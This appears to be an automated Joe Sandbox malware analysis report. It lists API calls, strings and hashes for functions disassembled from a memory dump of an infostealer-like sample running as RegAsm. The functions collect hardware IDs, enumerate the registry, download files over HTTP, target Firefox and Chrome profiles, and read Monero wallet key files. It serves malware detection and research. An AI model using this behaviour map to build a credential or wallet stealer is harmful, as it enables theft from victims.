                                                                                                        Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
                                                                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
                                                                                                        • wsprintfA.USER32 ref: 00410AA7
                                                                                                        • lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6
                                                                                                          • Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                          • Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                          • Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00410ACD
                                                                                                          • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                          • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                        • String ID: wA$:\$C$QuBi
                                                                                                        • API String ID: 1856320939-1441494722
                                                                                                        • Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                        • Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
                                                                                                        • Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
                                                                                                        • Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54
                                                                                                        Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
                                                                                                        • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
                                                                                                        • wsprintfA.USER32 ref: 004112DD
                                                                                                        • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00411347
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                        • String ID: - $%s\%s$?
                                                                                                        • API String ID: 1736561257-3278919252
                                                                                                        • Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                        • Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
                                                                                                        • Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
                                                                                                        • Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54
                                                                                                        Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 00406856
                                                                                                        • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406923
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040692A
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406936
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                        • String ID: <+A
                                                                                                        • API String ID: 2507841554-2778417545
                                                                                                        • Opcode ID: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
                                                                                                        • Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
                                                                                                        • Opcode Fuzzy Hash: 5e4e021ec0192b1193050b53ddbdf8b404a91beb29f97cbda7458c2ceee8302e
                                                                                                        • Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9
                                                                                                        Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                          • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                          • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                          • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                          • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                          • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                          • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416925
                                                                                                          • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                        • StrStrA.SHLWAPI(00000000,?), ref: 0041693A
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00416949
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00416962
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                        • API String ID: 4174444224-1526165396
                                                                                                        • Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                        • Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
                                                                                                        • Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
                                                                                                        • Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99
                                                                                                        Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
                                                                                                        • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
                                                                                                        • StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy
                                                                                                        • String ID: Stable\$ Stable\$firefox
                                                                                                        • API String ID: 3722407311-2697854757
                                                                                                        • Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                        • Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
                                                                                                        • Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
                                                                                                        • Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9
                                                                                                        Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                          • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                          • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                          • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                          • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                          • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                          • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
                                                                                                        • String ID: LzA
                                                                                                        • API String ID: 1968765330-1388989900
                                                                                                        • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                        • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                        • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                        • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                        Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                        • _memset.LIBCMT ref: 0040FBC1
                                                                                                        • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                          • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: OpenProcess_memmove_memset
                                                                                                        • String ID: N0ZWFt
                                                                                                        • API String ID: 2647191932-431618156
                                                                                                        • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                        • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                        • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                        • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                        Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                        • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                        • String ID: V@
                                                                                                        • API String ID: 2311089104-383300688
                                                                                                        • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                        • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                        • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                        • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                        Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00401ADC
                                                                                                          • Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                          • Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                          • Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                          • Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
                                                                                                        • lstrlenA.KERNEL32(?), ref: 00401AFE
                                                                                                        • lstrcatA.KERNEL32(?,.keys), ref: 00401B19
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
